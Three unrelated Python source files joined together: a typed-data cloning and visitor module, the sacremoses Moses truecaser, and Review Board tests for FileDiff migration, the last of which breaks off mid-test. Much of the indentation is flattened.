# Ugh, I don't like the conditional check...
if has_extrinsic(Original, obj):
obj = extrinsic(Original, obj)
return extrinsic(Location, obj)
def original(extr, obj):
return extrinsic(extr, extrinsic(Original, obj))
def original_has(extr, obj):
if not has_extrinsic(Original, obj):
return False
return has_extrinsic(extr, extrinsic(Original, obj))
def in_vat(func):
return in_env(VAT, VatContents([], {}, False), func)
# Clone structured data, recording information about its clone in the vat
def clone(src, extrinsics):
env(VAT).copiedExtrinsics = extrinsics
return clone_structured(src)
def clone_structured(src, apps=None):
ctor = instance_ctor(src)
fs = []
for field in ctor.fields:
fnm = extrinsic(Name, field)
ft = field.type
if apps:
ft = subst(apps, ft)
fs.append(clone_by_type(getattr(src, fnm), ft))
ctor_cls = extrinsic(TrueRepresentation, ctor)
vat = env(VAT)
if vat.transmute:
destData = vat.transmute.get(extrinsic(FormSpec, SUPERS[ctor_cls]))
if destData is not None:
ctor = transmuted_ctor(src, destData)
ctor_cls = extrinsic(TrueRepresentation, ctor)
o = ctor_cls(*fs)
for extr in vat.copiedExtrinsics:
if has_extrinsic(extr, src):
add_extrinsic(extr, o, extrinsic(extr, src))
if in_extrinsic_scope(Original):
set_orig(o, src)
vat.replacements[src] = o
return o
def clone_by_type(src, t):
cls = t.__class__
if cls is TVar:
        assert isinstance(src, Structured), \
"Can't clone unstructured %r without type info" % (src,)
return clone_structured(src)
elif cls in (TPrim, TFunc, TWeak):
return src
elif cls is TTuple:
assert isinstance(src, tuple)
return tuple(clone_by_type(v, tt) for v, tt in ezip(src, t.tupleTypes))
elif cls is TData:
assert isinstance(src, extrinsic(TrueRepresentation, t.data)), \
"Expected %s, got: %r" % (t.data, obj)
apps = t.appTypes and app_map(t.data, t.appTypes)
return clone_structured(src, apps)
elif cls is TArray:
assert isinstance(src, list)
return [clone_by_type(s, t.elemType) for s in src]
else:
assert False, "Bad type to clone: %r" % (t,)
def instance_ctor(obj):
ctors = t_DT(type(obj)).data.ctors
return ctors[obj._ctor_ix if len(ctors) > 1 else 0]
def transmuted_ctor(obj, destData):
ctors = destData.ctors
ix = obj._ctor_ix if len(ctors) > 1 else 0
assert ix < len(ctors), "Don't know how to transmute %s!" % (obj,)
return ctors[ix]
# Update an object's weak references to point at new clones from this vat
def rewrite(obj):
return rewrite_by_type(obj, t_DT(type(obj)))
def rewrite_by_type(obj, t):
cls = t.__class__
if cls is TVar:
        assert isinstance(obj, Structured), \
"Can't rewrite unstructured %r without type info" % (obj,)
rewrite_by_type(obj, t_DT(type(obj)))
elif cls in (TPrim, TFunc):
pass
elif cls is TTuple:
assert isinstance(obj, tuple)
for v, tt in ezip(obj, t.tupleTypes):
assert not isinstance(tt, TWeak), "TODO"
rewrite_by_type(v, tt)
elif cls is TData:
assert isinstance(obj, extrinsic(TrueRepresentation, t.data)), \
"Expected %s, found %s %s" % (t.data, type(obj), obj)
apps = t.appTypes and app_map(t.data, t.appTypes)
ctor = instance_ctor(obj)
repls = env(VAT).replacements
for field in ctor.fields:
fnm = extrinsic(Name, field)
ft = field.type
if apps:
ft = subst(apps, ft)
val = getattr(obj, fnm)
if isinstance(ft, TWeak):
if val in repls:
setattr(obj, fnm, repls[val])
else:
rewrite_by_type(val, ft)
elif cls is TArray:
et = t.elemType
assert isinstance(obj, list)
if isinstance(et, TWeak):
repls = env(VAT).replacements
for i, w in enumerate(obj):
if w in repls:
obj[i] = repls[w]
else:
for s in obj:
rewrite_by_type(s, et)
elif cls is TWeak:
assert False, "Shouldn't get here (should be rewritten in other cases)"
else:
assert False, "Bad type to rewrite: %r" % (t,)
# Clone a structured object, changing its type in the process
def transmute(obj, mapping, extrinsics):
vat = env(VAT)
vat.copiedExtrinsics = extrinsics
vat.transmute = dict((src.data, dest.data)
for src, dest in mapping.iteritems())
obj = clone_structured(obj)
vat.transmute = False
return obj
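# Illustrative sketch (not part of this module) of how the vat API above is
# meant to be driven: clone structured values inside a vat, then rewrite weak
# references so they point at the new clones. The objects being cloned and the
# Name extrinsic are assumed to be set up elsewhere; the names are hypothetical.
#
# def copy_all(values):
#     def go():
#         clones = [clone(v, [Name]) for v in values]  # deep copies, carrying Name
#         for c in clones:
#             rewrite(c)  # repoint weak refs at the clones recorded in this vat
#         return clones
#     return in_vat(go)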
# AST visitor&mutator (not really vat)
# Env+class is redundant; could just put this all in the class.
# But this is plumbing anyway
VISIT = new_env('VISIT', None)
def visit(visitor, obj, t):
inst = visitor()
inst.obj = inst.t = inst.fts = None
if isinstance(t, basestring):
t = parse_type(t)
in_env(VISIT, inst, lambda: visit_by_type(obj, t))
class Visitor(object):
def visit(self, *path):
obj, t = self.obj, self.t
for field in path:
if isinstance(field, int):
assert isinstance(t, TArray), "Can't index %s" % (t,)
obj = obj[field]
t = t.elemType
continue
assert field in self.fts, \
"%s is not a field {%s}" % (field, ', '.join(self.fts))
t = self.fts[field]
# Catch some stupidity
if len(path) == 1:
assert t is not None, "Already visited this field!"
self.fts[field] = None
assert not isinstance(t, TWeak), \
"%s is weak and won't be visited" % (field,)
obj = getattr(obj, field)
return visit_by_type(obj, t, bool(path))
def visit_by_type(obj, t, customVisitors=True):
cls = t.__class__
if cls in (TVar, TPrim, TFunc, TWeak):
pass
elif cls is TTuple:
assert isinstance(obj, tuple)
for v, tt in ezip(obj, t.tupleTypes):
visit_by_type(v, tt)
elif cls is TData:
data = t.data
assert isinstance(obj, extrinsic(TrueRepresentation, data)), \
"Expected %s, got %s %s" % (data, type(obj), obj)
apps = t.appTypes and app_map(data, t.appTypes)
visitor = env(VISIT)
ctor = extrinsic(FormSpec, type(obj))
fts = dict((extrinsic(Name, f), subst(apps,f.type) if apps else f.type)
for f in ctor.fields)
if customVisitors:
custom = getattr(visitor, extrinsic(Name, ctor), None)
if custom is None:
custom = getattr(visitor, 't_'+extrinsic(Name, data), None)
if custom is not None:
# Scope field types for recursive visiting
old = visitor.obj, visitor.t, visitor.fts
visitor.obj, visitor.t, visitor.fts = obj, t, fts
custom(obj)
visitor.obj, visitor.t, visitor.fts = old
return
# Default to recursive visits
for field in ctor.fields:
fnm = extrinsic(Name, field)
ft = fts[fnm]
if not isinstance(ft, TWeak):
visit_by_type(getattr(obj, fnm), ft)
elif cls is TArray:
assert isinstance(obj, list)
if not isinstance(t.elemType, TWeak):
for o in obj:
visit_by_type(o, t.elemType)
else:
assert False, "Bad type to visit: %r" % (t,)
MUTATE = new_env('MUTATE', None)
def mutate(mutator, obj, t):
inst = mutator()
inst.obj = inst.t = inst.fts = None
if isinstance(t, basestring):
t = parse_type(t)
return in_env(MUTATE, inst, lambda: mutate_by_type(obj, t))
class Mutator(object):
def mutate(self, *path):
obj, t = self.obj, self.t
for field in path:
if isinstance(field, int):
assert isinstance(t, TArray), "Can't index %s" % (t,)
obj = obj[field]
t = t.elemType
continue
assert field in self.fts, \
"%s is not a field {%s}" % (field, ', '.join(self.fts))
t = self.fts[field]
# Catch some stupidity
if len(path) == 1:
assert t is not None, "Already mutated this field!"
self.fts[field] = None
assert not isinstance(t, TWeak), \
"%s is weak and won't be mutated" % (field,)
obj = getattr(obj, field)
return mutate_by_type(obj, t, bool(path))
def mutate_by_type(obj, t, customMutators=True):
cls = t.__class__
if cls in (TVar, TPrim, TFunc, TWeak):
return obj
elif cls is TTuple:
assert isinstance(obj, tuple)
        return tuple(mutate_by_type(v, tt)
                     for v, tt in ezip(obj, t.tupleTypes))
elif cls is TData:
data = t.data
assert isinstance(obj, extrinsic(TrueRepresentation, data)), \
"Expected %s, got %r: %r" % (data, type(obj), obj)
apps = t.appTypes and app_map(data, t.appTypes)
mutator = env(MUTATE)
ctor = extrinsic(FormSpec, type(obj))
fts = dict((extrinsic(Name, f), subst(apps,f.type) if apps else f.type)
for f in ctor.fields)
if customMutators:
custom = getattr(mutator, extrinsic(Name, ctor), None)
if custom is None:
custom = getattr(mutator, 't_'+extrinsic(Name, data), None)
if custom is not None:
                # Scope field types for recursive mutation
old = mutator.obj, mutator.t, mutator.fts
mutator.obj, mutator.t, mutator.fts = obj, t, fts
obj = custom(obj)
mutator.obj, mutator.t, mutator.fts = old
return obj
# Default to recursive mutation
for field in ctor.fields:
fnm = extrinsic(Name, field)
ft = fts[fnm]
if not isinstance(ft, TWeak):
val = getattr(obj, fnm)
setattr(obj, fnm, mutate_by_type(val, ft))
return obj
elif cls is TArray:
et = t.elemType
assert isinstance(obj, list)
if isinstance(et, TWeak):
return obj
return [mutate_by_type(o, et) for o in obj]
else:
assert False, "Bad type to mutate: %r" % (t,)
# COMBINATORIAL EXPLOSIONS
REIFIED_MONOTYPES = {}
def cement_type(t):
key = type_key(t)
if key in CONCRETE_TYPES:
return CONCRETE_TYPES[key]
else:
assert False
def type_key(t):
m = match(t)
if m('TPrim(prim)'):
return prim_key(m.prim)
elif m('TData(dt, ts)'):
nm = extrinsic(Name, dt)
return '%s(%s)' % (nm, ', '.join(type_key(a) for a in m.ts))
elif m('TArray(t, _)'): # kind?
return '[%s]' % (type_key(m.t),)
elif m('TWeak(t)'):
return '*%s' % (type_key(m.t),)
elif m('TTuple(ts)'):
return 't(%s)' % (', '.join(type_key(t) for t in m.ts),)
elif m('TVar(tv)'):
return 'ax%x' % (id(tv),)
elif m('TFunc(ps, r, _)'):
        ts = [type_key(p) for p in m.ps]
ts.append(match(m.r, ('Ret(t)', type_key),
('Void()', lambda: 'void'),
('Bottom()', lambda: 'bottom')))
return 'f(%s)' % (' -> '.join(ts),)
else:
assert False
def prim_key(p):
m = match(p)
if m('PInt()'): return 'int'
elif m('PFloat()'): return 'float'
elif m('PStr()'): return 'str'
elif m('PChar()'): return 'char'
elif m('PBool()'): return 'bool'
else: assert False
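# For illustration (derived from the branches above): a primitive int keys as
# 'int', a list of ints as '[int]', a weak reference to that list as '*[int]',
# and a function from int to bool as 'f(int -> bool)'.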
# vi: set sw=4 ts=4 sts=4 tw=79 ai et nocindent:
|
|
# -*- coding: utf-8 -*-
from __future__ import print_function
import re
from collections import defaultdict, Counter
from functools import partial
from itertools import chain
from six import text_type
from sacremoses.corpus import Perluniprops
from sacremoses.corpus import NonbreakingPrefixes
from sacremoses.util import parallelize_preprocess, grouper
# Hack to enable Python2.7 to use encoding.
import sys
if sys.version_info[0] < 3:
import io
import warnings
open = io.open
warnings.warn(
str(
"You should really be using Python3!!! "
"Tick tock, tick tock, https://pythonclock.org/"
)
)
perluniprops = Perluniprops()
class MosesTruecaser(object):
"""
This is a Python port of the Moses Truecaser from
https://github.com/moses-smt/mosesdecoder/blob/master/scripts/recaser/train-truecaser.perl
https://github.com/moses-smt/mosesdecoder/blob/master/scripts/recaser/truecase.perl
"""
# Perl Unicode Properties character sets.
Lowercase_Letter = text_type("".join(perluniprops.chars("Lowercase_Letter")))
Uppercase_Letter = text_type("".join(perluniprops.chars("Uppercase_Letter")))
Titlecase_Letter = text_type("".join(perluniprops.chars("Uppercase_Letter")))
def __init__(self, load_from=None, is_asr=None, encoding="utf8"):
"""
:param load_from:
:type load_from:
        :param is_asr: A flag to indicate that the model is for ASR. ASR input
            has no case, so tokens are lowercased first and the best known
            casing is applied, e.g. 'i' is restored to 'I' when that is the
            known form.
:type is_asr: bool
"""
# Initialize the object.
super(MosesTruecaser, self).__init__()
# Initialize the language specific nonbreaking prefixes.
self.SKIP_LETTERS_REGEX = re.compile(
u"[{}{}{}]".format(
self.Lowercase_Letter, self.Uppercase_Letter, self.Titlecase_Letter
)
)
self.XML_SPLIT_REGX = re.compile("(<.*(?<=>))(.*)((?=</)[^>]*>)")
self.SENT_END = {".", ":", "?", "!"}
        self.DELAYED_SENT_START = {
            "(",
            "[",
            '"',
            "'",
            "&apos;",
            "&quot;",
            "&#91;",
            "&#93;",
        }
self.encoding = encoding
self.is_asr = is_asr
if load_from:
self.model = self._load_model(load_from)
def learn_truecase_weights(self, tokens, possibly_use_first_token=False):
"""
        This function checks through each token in a sentence and returns the
appropriate weight of each surface token form.
"""
# Keep track of first tokens in the sentence(s) of the line.
is_first_word = True
truecase_weights = []
for i, token in enumerate(tokens):
# Skip XML tags.
if re.search(r"(<\S[^>]*>)", token):
continue
# Skip if sentence start symbols.
elif token in self.DELAYED_SENT_START:
continue
# Resets the `is_first_word` after seeing sent end symbols.
if not is_first_word and token in self.SENT_END:
is_first_word = True
continue
# Skips tokens with nothing to case.
if not self.SKIP_LETTERS_REGEX.search(token):
is_first_word = False
continue
# If it's not the first word,
# then set the current word weight to 1.
current_word_weight = 0
if not is_first_word:
current_word_weight = 1
# Otherwise check whether user wants to optionally
# use the first word.
elif possibly_use_first_token:
# Gated special handling of first word of sentence.
                # Check if the first character of the token is lowercase.
if token[0].islower():
current_word_weight = 1
elif i == 1:
current_word_weight = 0.1
is_first_word = False
if current_word_weight > 0:
truecase_weights.append((token.lower(), token, current_word_weight))
return truecase_weights
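    # Illustrative example (derived from the logic above, not a doctest): for
    # tokens ['The', 'cat', 'sat', '.'] with possibly_use_first_token=False,
    # 'The' is skipped as sentence-initial and '.' resets the sentence start,
    # so the returned weights are [('cat', 'cat', 1), ('sat', 'sat', 1)].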
def _train(
self,
document_iterator,
save_to=None,
possibly_use_first_token=False,
processes=1,
progress_bar=False,
):
"""
        :param document_iterator: The input document: an iterable of sentences,
            where each sentence is a list of tokens.
:type document_iterator: iter(list(str))
:param possibly_use_first_token: When True, on the basis that the first
word of a sentence is always capitalized; if this option is provided then:
a) if a sentence-initial token is *not* capitalized, then it is counted, and
b) if a capitalized sentence-initial token is the only token of the segment,
then it is counted, but with only 10% of the weight of a normal token.
:type possibly_use_first_token: bool
:returns: A dictionary of the best, known objects as values from `_casing_to_model()`
:rtype: {'best': dict, 'known': Counter}
"""
casing = defaultdict(Counter)
train_truecaser = partial(
self.learn_truecase_weights,
possibly_use_first_token=possibly_use_first_token,
)
token_weights = chain(
*parallelize_preprocess(
train_truecaser, document_iterator, processes, progress_bar=progress_bar
)
)
# Collect the token_weights from every sentence.
for lowercase_token, surface_token, weight in token_weights:
casing[lowercase_token][surface_token] += weight
# Save to file if specified.
if save_to:
self._save_model_from_casing(casing, save_to)
return self._casing_to_model(casing)
def train(
self,
documents,
save_to=None,
possibly_use_first_token=False,
processes=1,
progress_bar=False,
):
"""
Default duck-type of _train(), accepts list(list(str)) as input documents.
"""
self.model = None # Clear the model first.
self.model = self._train(
documents,
save_to,
possibly_use_first_token,
processes,
progress_bar=progress_bar,
)
return self.model
def train_from_file(
self,
filename,
save_to=None,
possibly_use_first_token=False,
processes=1,
progress_bar=False,
):
"""
        Duck-type of _train(), accepts a filename to read as an `iter(list(str))`
object.
"""
with open(filename, encoding=self.encoding) as fin:
# document_iterator = map(str.split, fin.readlines())
document_iterator = (
line.split() for line in fin.readlines()
            )  # Let's try a generator expression for Python 2...
self.model = None # Clear the model first.
self.model = self._train(
document_iterator,
save_to,
possibly_use_first_token,
processes,
progress_bar=progress_bar,
)
return self.model
def train_from_file_object(
self,
file_object,
save_to=None,
possibly_use_first_token=False,
processes=1,
progress_bar=False,
):
"""
        Duck-type of _train(), accepts a file object to read as an `iter(list(str))`
object.
"""
# document_iterator = map(str.split, file_object.readlines())
document_iterator = (
line.split() for line in file_object.readlines()
        )  # Let's try a generator expression for Python 2...
self.model = None # Clear the model first.
self.model = self._train(
document_iterator,
save_to,
possibly_use_first_token,
processes,
progress_bar=progress_bar,
)
return self.model
def truecase(self, text, return_str=False, use_known=False):
"""
Truecase a single sentence / line of text.
:param text: A single string, i.e. sentence text.
:type text: str
:param use_known: Use the known case if a word is a known word but not the first word.
:type use_known: bool
"""
check_model_message = str(
"\nUse Truecaser.train() to train a model.\n"
"Or use Truecaser('modefile') to load a model."
)
assert hasattr(self, "model"), check_model_message
# Keep track of first tokens in the sentence(s) of the line.
is_first_word = True
truecased_tokens = []
tokens = self.split_xml(text)
# best_cases = best_cases if best_cases else self.model['best']
# known_cases = known_cases if known_cases else self.model['known']
for i, token in enumerate(tokens):
# Append XML tags and continue
if re.search(r"(<\S[^>]*>)", token):
truecased_tokens.append(token)
continue
            # Note this shouldn't happen unless | is escaped as &#124;.
            # To make the truecaser resilient,
            # we'll just leave any token starting with pipes as it is.
if token == "|" or token.startswith("|"):
truecased_tokens.append(token)
continue
            # Reads the word token and factors separately.
token, other_factors = re.search(r"^([^\|]+)(.*)", token).groups()
# Lowercase the ASR tokens.
if self.is_asr:
token = token.lower()
# The actual case replacement happens here.
# "Most frequent" case of the word.
best_case = self.model["best"].get(token.lower(), None)
# Other known cases of the word.
known_case = self.model["known"].get(token, None)
# If it's the start of sentence.
if is_first_word and best_case: # Truecase sentence start.
token = best_case
elif known_case: # Don't change known tokens.
token = known_case if use_known else token
elif (
best_case
): # Truecase otherwise unknown tokens? Heh? From https://github.com/moses-smt/mosesdecoder/blob/master/scripts/recaser/truecase.perl#L66
token = best_case
# Else, it's an unknown word, don't change the word.
# Concat the truecased `word` with the `other_factors`
token = token + other_factors
# Adds the truecased word.
truecased_tokens.append(token)
# Resets sentence start if this token is an ending punctuation.
is_first_word = token in self.SENT_END
if token in self.DELAYED_SENT_START:
is_first_word = False
# return ' '.join(tokens)
return " ".join(truecased_tokens) if return_str else truecased_tokens
def truecase_file(self, filename, return_str=True):
with open(filename, encoding=self.encoding) as fin:
for line in fin:
truecased_tokens = self.truecase(line.strip())
# Yield the truecased line.
yield " ".join(truecased_tokens) if return_str else truecased_tokens
@staticmethod
def split_xml(line):
"""
Python port of split_xml function in Moses' truecaser:
https://github.com/moses-smt/mosesdecoder/blob/master/scripts/recaser/truecaser.perl
:param line: Input string, should be tokenized, separated by space.
:type line: str
"""
line = line.strip()
tokens = []
while line:
# Assumes that xml tag is always separated by space.
has_xml = re.search(r"^\s*(<\S[^>]*>)(.*)$", line)
# non-XML test.
is_non_xml = re.search(r"^\s*([^\s<>]+)(.*)$", line)
# '<' or '>' occurs in word, but it's not an XML tag
xml_cognates = re.search(r"^\s*(\S+)(.*)$", line)
if has_xml:
potential_xml, line_next = has_xml.groups()
# exception for factor that is an XML tag
if (
re.search(r"^\S", line)
and len(tokens) > 0
and re.search(r"\|$", tokens[-1])
):
tokens[-1] += potential_xml
# If it's a token with factors, join with the previous token.
is_factor = re.search(r"^(\|+)(.*)$", line_next)
if is_factor:
tokens[-1] += is_factor.group(1)
line_next = is_factor.group(2)
else:
tokens.append(
potential_xml + " "
) # Token hack, unique to sacremoses.
line = line_next
elif is_non_xml:
tokens.append(is_non_xml.group(1)) # Token hack, unique to sacremoses.
line = is_non_xml.group(2)
elif xml_cognates:
tokens.append(
xml_cognates.group(1)
) # Token hack, unique to sacremoses.
line = xml_cognates.group(2)
else:
raise Exception("ERROR: huh? {}".format(line))
tokens[-1] = tokens[-1].strip() # Token hack, unique to sacremoses.
return tokens
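    # Illustrative trace (derived from the code above, not a doctest):
    # split_xml('<b> hello </b>') yields ['<b> ', 'hello', '</b>']; the
    # trailing space on the opening tag comes from the "token hack" noted
    # above, and the final token is stripped.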
def _casing_to_model(self, casing):
"""
        :returns: A dictionary of the 'best', 'known' and 'casing' objects.
        :rtype: {'best': dict, 'known': Counter, 'casing': defaultdict(Counter)}
"""
best = {}
known = Counter()
for token_lower in casing:
tokens = casing[token_lower].most_common()
# Set the most frequent case as the "best" case.
best[token_lower] = tokens[0][0]
# If it's asr, throw away everything
if not self.is_asr:
for token, count in tokens[1:]:
# Note: This is rather odd that the counts are thrown away...
# from https://github.com/moses-smt/mosesdecoder/blob/master/scripts/recaser/truecase.perl#L34
known[token] += 1
model = {"best": best, "known": known, "casing": casing}
return model
def save_model(self, filename):
self._save_model_from_casing(self.model["casing"], filename)
def _save_model_from_casing(self, casing, filename):
"""
Outputs the truecaser model file in the same output format as
https://github.com/moses-smt/mosesdecoder/blob/master/scripts/recaser/train-truecaser.perl
:param casing: The dictionary of tokens counter from `train()`.
        :type casing: defaultdict(Counter)
"""
with open(filename, "w", encoding=self.encoding) as fout:
for token in casing:
total_token_count = sum(casing[token].values())
tokens_counts = []
for i, (token, count) in enumerate(casing[token].most_common()):
if i == 0:
out_token = "{} ({}/{})".format(token, count, total_token_count)
else:
out_token = "{} ({})".format(token, count, total_token_count)
tokens_counts.append(out_token)
print(" ".join(tokens_counts), end="\n", file=fout)
def _load_model(self, filename):
"""
Loads pre-trained truecasing file.
:returns: A dictionary of the best, known objects as values from `_casing_to_model()`
:rtype: {'best': dict, 'known': Counter}
"""
casing = defaultdict(Counter)
with open(filename, encoding=self.encoding) as fin:
for line in fin:
line = line.strip().split()
for token, count in grouper(line, 2):
count = count.split("/")[0].strip("()")
casing[token.lower()][token] = int(count)
# Returns the best and known object from `_casing_to_model()`
return self._casing_to_model(casing)
class MosesDetruecaser(object):
def __init__(self):
# Initialize the object.
super(MosesDetruecaser, self).__init__()
self.SENT_END = {".", ":", "?", "!"}
        self.DELAYED_SENT_START = {
            "(",
            "[",
            '"',
            "'",
            "&apos;",
            "&quot;",
            "&#91;",
            "&#93;",
        }
# Some predefined tokens that will always be in lowercase.
self.ALWAYS_LOWER = {
"a",
"after",
"against",
"al-.+",
"and",
"any",
"as",
"at",
"be",
"because",
"between",
"by",
"during",
"el-.+",
"for",
"from",
"his",
"in",
"is",
"its",
"last",
"not",
"of",
"off",
"on",
"than",
"the",
"their",
"this",
"to",
"was",
"were",
"which",
"will",
"with",
}
def detruecase(self, text, is_headline=False, return_str=False):
"""
Detruecase the translated files from a model that learnt from truecased
tokens.
:param text: A single string, i.e. sentence text.
:type text: str
"""
# `cased_tokens` keep tracks of detruecased tokens.
cased_tokens = []
sentence_start = True
# Capitalize token if it's at the sentence start.
for token in text.split():
token = token[:1].upper() + token[1:] if sentence_start else token
cased_tokens.append(token)
if token in self.SENT_END:
sentence_start = True
elif not token in self.DELAYED_SENT_START:
sentence_start = False
# Check if it's a headline, if so then use title case.
if is_headline:
cased_tokens = [
token if token in self.ALWAYS_LOWER else token[:1].upper() + token[1:]
for token in cased_tokens
]
return " ".join(cased_tokens) if return_str else cased_tokens
__all__ = ["MosesTruecaser", "MosesDetruecaser"]
|
|
from __future__ import unicode_literals
from djblets.db.fields import Base64DecodedValue
from reviewboard.diffviewer.models import (DiffSet, FileDiff,
LegacyFileDiffData,
RawFileDiffData)
from reviewboard.testing import TestCase
class FileDiffMigrationTests(TestCase):
"""Unit tests for FileDiff migration."""
fixtures = ['test_scmtools']
def setUp(self):
super(FileDiffMigrationTests, self).setUp()
self.repository = self.create_repository(tool_name='Test')
diffset = DiffSet.objects.create(name='test',
revision=1,
repository=self.repository)
self.filediff = FileDiff(source_file='README',
dest_file='README',
diffset=diffset,
diff64=b'',
parent_diff64=b'')
self.parent_diff = (
b'diff --git a/README b/README\n'
b'index 94bdd3e..3d2b777 100644\n'
b'--- README\n'
b'+++ README\n'
b'@@ -2 +2 @@\n'
b'-blah..\n'
b'+blah blah\n'
)
def test_migration_by_diff(self):
"""Testing RawFileDiffData migration accessing FileDiff.diff"""
self.filediff.diff64 = self.DEFAULT_GIT_FILEDIFF_DATA_DIFF
self.assertIsNone(self.filediff.diff_hash)
self.assertIsNone(self.filediff.parent_diff_hash)
# This should prompt the migration.
diff = self.filediff.diff
self.assertIsNone(self.filediff.parent_diff_hash)
self.assertIsNotNone(self.filediff.diff_hash)
self.assertEqual(diff, self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(self.filediff.diff64, b'')
self.assertEqual(self.filediff.diff_hash.binary,
self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(self.filediff.diff, diff)
self.assertIsNone(self.filediff.parent_diff)
self.assertIsNone(self.filediff.parent_diff_hash)
def test_migration_by_parent_diff(self):
"""Testing RawFileDiffData migration accessing FileDiff.parent_diff"""
self.filediff.diff64 = self.DEFAULT_GIT_FILEDIFF_DATA_DIFF
self.filediff.parent_diff64 = self.parent_diff
self.assertIsNone(self.filediff.parent_diff_hash)
# This should prompt the migration.
parent_diff = self.filediff.parent_diff
self.assertIsNotNone(self.filediff.parent_diff_hash)
self.assertEqual(parent_diff, self.parent_diff)
self.assertEqual(self.filediff.parent_diff64, b'')
self.assertEqual(self.filediff.parent_diff_hash.binary,
self.parent_diff)
self.assertEqual(self.filediff.parent_diff, self.parent_diff)
def test_migration_by_delete_count(self):
"""Testing RawFileDiffData migration accessing FileDiff.delete_count"""
self.filediff.diff64 = self.DEFAULT_GIT_FILEDIFF_DATA_DIFF
self.assertIsNone(self.filediff.diff_hash)
# This should prompt the migration.
counts = self.filediff.get_line_counts()
self.assertIsNotNone(self.filediff.diff_hash)
self.assertEqual(counts['raw_delete_count'], 1)
self.assertEqual(self.filediff.diff_hash.delete_count, 1)
def test_migration_by_insert_count(self):
"""Testing RawFileDiffData migration accessing FileDiff.insert_count"""
self.filediff.diff64 = self.DEFAULT_GIT_FILEDIFF_DATA_DIFF
self.assertIsNone(self.filediff.diff_hash)
# This should prompt the migration.
counts = self.filediff.get_line_counts()
self.assertIsNotNone(self.filediff.diff_hash)
self.assertEqual(counts['raw_insert_count'], 1)
self.assertEqual(self.filediff.diff_hash.insert_count, 1)
def test_migration_by_set_line_counts(self):
"""Testing RawFileDiffData migration calling FileDiff.set_line_counts
"""
self.filediff.diff64 = self.DEFAULT_GIT_FILEDIFF_DATA_DIFF
self.assertIsNone(self.filediff.diff_hash)
# This should prompt the migration, but with our line counts.
self.filediff.set_line_counts(raw_insert_count=10,
raw_delete_count=20)
self.assertIsNotNone(self.filediff.diff_hash)
counts = self.filediff.get_line_counts()
self.assertEqual(counts['raw_insert_count'], 10)
self.assertEqual(counts['raw_delete_count'], 20)
self.assertEqual(self.filediff.diff_hash.insert_count, 10)
self.assertEqual(self.filediff.diff_hash.delete_count, 20)
def test_migration_by_legacy_diff_hash(self):
"""Testing RawFileDiffData migration accessing FileDiff.diff
with associated LegacyFileDiffData
"""
legacy = LegacyFileDiffData.objects.create(
binary_hash='abc123',
binary=Base64DecodedValue(self.DEFAULT_GIT_FILEDIFF_DATA_DIFF))
self.filediff.legacy_diff_hash = legacy
self.filediff.save()
# This should prompt the migration.
diff = self.filediff.diff
self.assertIsNotNone(self.filediff.diff_hash)
self.assertIsNone(self.filediff.parent_diff_hash)
self.assertIsNone(self.filediff.legacy_diff_hash)
self.assertEqual(LegacyFileDiffData.objects.count(), 0)
self.assertEqual(diff, self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(self.filediff.diff64, b'')
self.assertEqual(self.filediff.diff_hash.content,
self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(self.filediff.diff, diff)
self.assertIsNone(self.filediff.parent_diff)
self.assertIsNone(self.filediff.parent_diff_hash)
def test_migration_by_shared_legacy_diff_hash(self):
"""Testing RawFileDiffData migration accessing FileDiff.diff
with associated shared LegacyFileDiffData
"""
legacy = LegacyFileDiffData.objects.create(
binary_hash='abc123',
binary=Base64DecodedValue(self.DEFAULT_GIT_FILEDIFF_DATA_DIFF))
self.filediff.legacy_diff_hash = legacy
self.filediff.save()
# Create a second FileDiff using this legacy data.
diffset = DiffSet.objects.create(name='test',
revision=1,
repository=self.repository)
FileDiff.objects.create(source_file='README',
dest_file='README',
diffset=diffset,
diff64=b'',
parent_diff64=b'',
legacy_diff_hash=legacy)
# This should prompt the migration.
diff = self.filediff.diff
self.assertIsNotNone(self.filediff.diff_hash)
self.assertIsNone(self.filediff.parent_diff_hash)
self.assertIsNone(self.filediff.legacy_diff_hash)
self.assertEqual(LegacyFileDiffData.objects.count(), 1)
self.assertEqual(diff, self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(self.filediff.diff64, b'')
self.assertEqual(self.filediff.diff_hash.content,
self.DEFAULT_GIT_FILEDIFF_DATA_DIFF)
self.assertEqual(self.filediff.diff, diff)
self.assertIsNone(self.filediff.parent_diff)
self.assertIsNone(self.filediff.parent_diff_hash)
def test_migration_by_legacy_parent_diff_hash(self):
"""Testing RawFileDiffData migration accessing FileDiff.parent_diff
with associated LegacyFileDiffData
"""
legacy = LegacyFileDiffData.objects.create(
binary_hash='abc123',
binary=Base64DecodedValue(self.parent_diff))
self.filediff.legacy_parent_diff_hash = legacy
self.filediff.save()
# This should prompt the migration.
parent_diff = self.filediff.parent_diff
self.assertIsNotNone(self.filediff.parent_diff_hash)
self.assertIsNone(self.filediff.legacy_parent_diff_hash)
self.assertEqual(parent_diff, self.parent_diff)
self.assertEqual(self.filediff.parent_diff64, b'')
self.assertEqual(self.filediff.parent_diff_hash.content,
self.parent_diff)
self.assertEqual(self.filediff.parent_diff, parent_diff)
def test_migration_by_shared_legacy_parent_diff_hash(self):
"""Testing RawFileDiffData migration accessing FileDiff.parent_diff
with associated shared LegacyFileDiffData
"""
legacy = LegacyFileDiffData.objects.create(
binary_hash='abc123',
binary=Base64DecodedValue(self.parent_diff))
self.filediff.legacy_parent_diff_hash = legacy
self.filediff.save()
# Create a second FileDiff using this legacy data.
diffset = DiffSet.objects.create(name='test',
revision=1,
repository=self.repository)
FileDiff.objects.create(source_file='README',
dest_file='README',
diffset=diffset,
diff64=b'',
parent_diff64=b'',
legacy_parent_diff_hash=legacy)
# This should prompt the migration.
parent_diff = self.filediff.parent_diff
self.assertIsNotNone(self.filediff.parent_diff_hash)
self.assertIsNone(self.filediff.legacy_parent_diff_hash)
self.assertEqual(LegacyFileDiffData.objects.count(), 1)
self.assertEqual(parent_diff, self.parent_diff)
self.assertEqual(self.filediff.parent_diff64, b'')
self.assertEqual(self.filediff.parent_diff_hash.content,
self.parent_diff)
self.assertEqual(self.filediff.parent_diff, parent_diff)
def test_migration_with_legacy_and_race_condition(self):
"""Testing RawFileDiffData migration with LegacyFileDiffData and race
condition in migrating
"""
legacy = LegacyFileDiffData.objects.create(
binary_hash='abc123',
